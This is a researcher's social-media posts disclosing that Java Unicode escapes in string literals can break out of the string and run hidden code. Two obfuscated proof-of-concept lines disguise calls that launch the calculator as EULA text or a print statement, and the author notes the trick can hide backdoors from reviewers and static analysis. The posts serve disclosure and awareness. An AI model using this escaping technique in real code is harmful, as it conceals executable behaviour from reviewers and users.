Profile cover photo
Profile photo
Abraham Kang
32 followers
32 followers
About
Abraham's posts

Post has attachment

Post has attachment

Post has attachment

Post has attachment

Post has attachment

Post has attachment
I know I have been quiet for a while but wanted to start reaching out to people again.

I am working on a book / guide called either "Avoiding the pitfalls of Static Analysis" or "Getting the Most Out of Static Analysis".

Let me know if you think the content is helpful

What about the following:

//Declaring a String executes code
String Spanish_EULA =  "\u0022\u003b\u0074\u0072\u0079\u0020\u007b\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063\u0028\u0022\u006f\u0070\u0065\u006e\u0020\u002d\u0061\u0020\u0043\u0061\u006c\u0063\u0075\u006c\u0061\u0074\u006f\u0072\u0022\u0029\u003b\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0049\u004f\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0065\u002e\u0070\u0072\u0069\u006e\u0074\u0053\u0074\u0061\u0063\u006b\u0054\u0072\u0061\u0063\u0065\u0028\u0029\u003b\u007d\u0074\u0072\u0079\u0020\u007b\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063\u0028\u0022\u0063\u0061\u006c\u0063\u0022\u0029\u003b\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0049\u004f\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0065\u002e\u0070\u0072\u0069\u006e\u0074\u0053\u0074\u0061\u0063\u006b\u0054\u0072\u0061\u0063\u0065\u0028\u0029\u003b\u007d\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0078\u0020\u003d\u0020\u0022";

Unicode character escaping is similar to HTML escaping in the minds of most people.  When you HTML encode strings you expect them not to be evaluated as mark up.  Similarly, if you unicode encode strings you expect the characters to be treated as text not code.  Jeff, you wrote the XSS Cheat Sheet.  You know what am talking about.

If the spec allows this then it should be changed for the above reason.

Well I got a lot of feedback from the disclosure.  Some people, and rightly so pointed out that this had been disclosed a while ago.  They are correct to a certain extent but they way I used it was counter to what was expected.

What was disclosed before looked like:

/*
\u00a3\u003c…
*/

and 

<%\u00a3\u003c…%>

Good findings but when a code reviewer looks at these they will instantly know something is up.

What about the following

System.out.println("Russian EULA:  \u00a3\u003c…");

The whole purpose of the unicode encodings was to allow you to embed unicode characters into your program.

System.out.println("\u0053\u0074\u0061\u0072\u0074\");

Prints "Start"

A normal developer would think that Unicode characters in between quotes would be treated as text.  Unfortunately, as my previous posting shows, this is not the case.

I think this is a bug or an oversight in the Java spec.  

Because the bad guys can used this to hide code without raising suspicions I think it is a vulnerability.

Respectfully,
Abe

Found something interesting in Java.  Reported this as a bug over two years ago to Oracle but looks like they did not do anything.

Besides hiding back doors in code, avoiding static analysis and printing text based pictures does anyone have any ideas on what else this could be used for.

System.out.println("\u0053\u0074\u0061\u0072\u0074\u0020\u0054\u0065\u0073\u0074\u0022\u0029\u003b\u0074\u0072\u0079\u007b\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063\u0028\u0022\u006f\u0070\u0065\u006e\u0020\u002d\u0061\u0020\u0043\u0061\u006c\u0063\u0075\u006c\u0061\u0074\u006f\u0072\u0022\u0029\u003b\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0049\u004f\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0065\u002e\u0070\u0072\u0069\u006e\u0074\u0053\u0074\u0061\u0063\u006b\u0054\u0072\u0061\u0063\u0065\u0028\u0029\u003b\u007d\u0074\u0072\u0079\u0020\u007b\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063\u0028\u0022\u0063\u0061\u006c\u0063\u0022\u0029\u003b\u007d\u0063\u0061\u0074\u0063\u0068\u0028\u0049\u004f\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0065\u002e\u0070\u0072\u0069\u006e\u0074\u0053\u0074\u0061\u0063\u006b\u0054\u0072\u0061\u0063\u0065\u0028\u0029\u003b\u007d\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u006f\u0075\u0074\u002e\u0070\u0072\u0069\u006e\u0074\u006c\u006e\u0028\u0022\u0045\u006e\u0064\u0020\u0054\u0065\u0073\u0074");
Wait while more posts are being loaded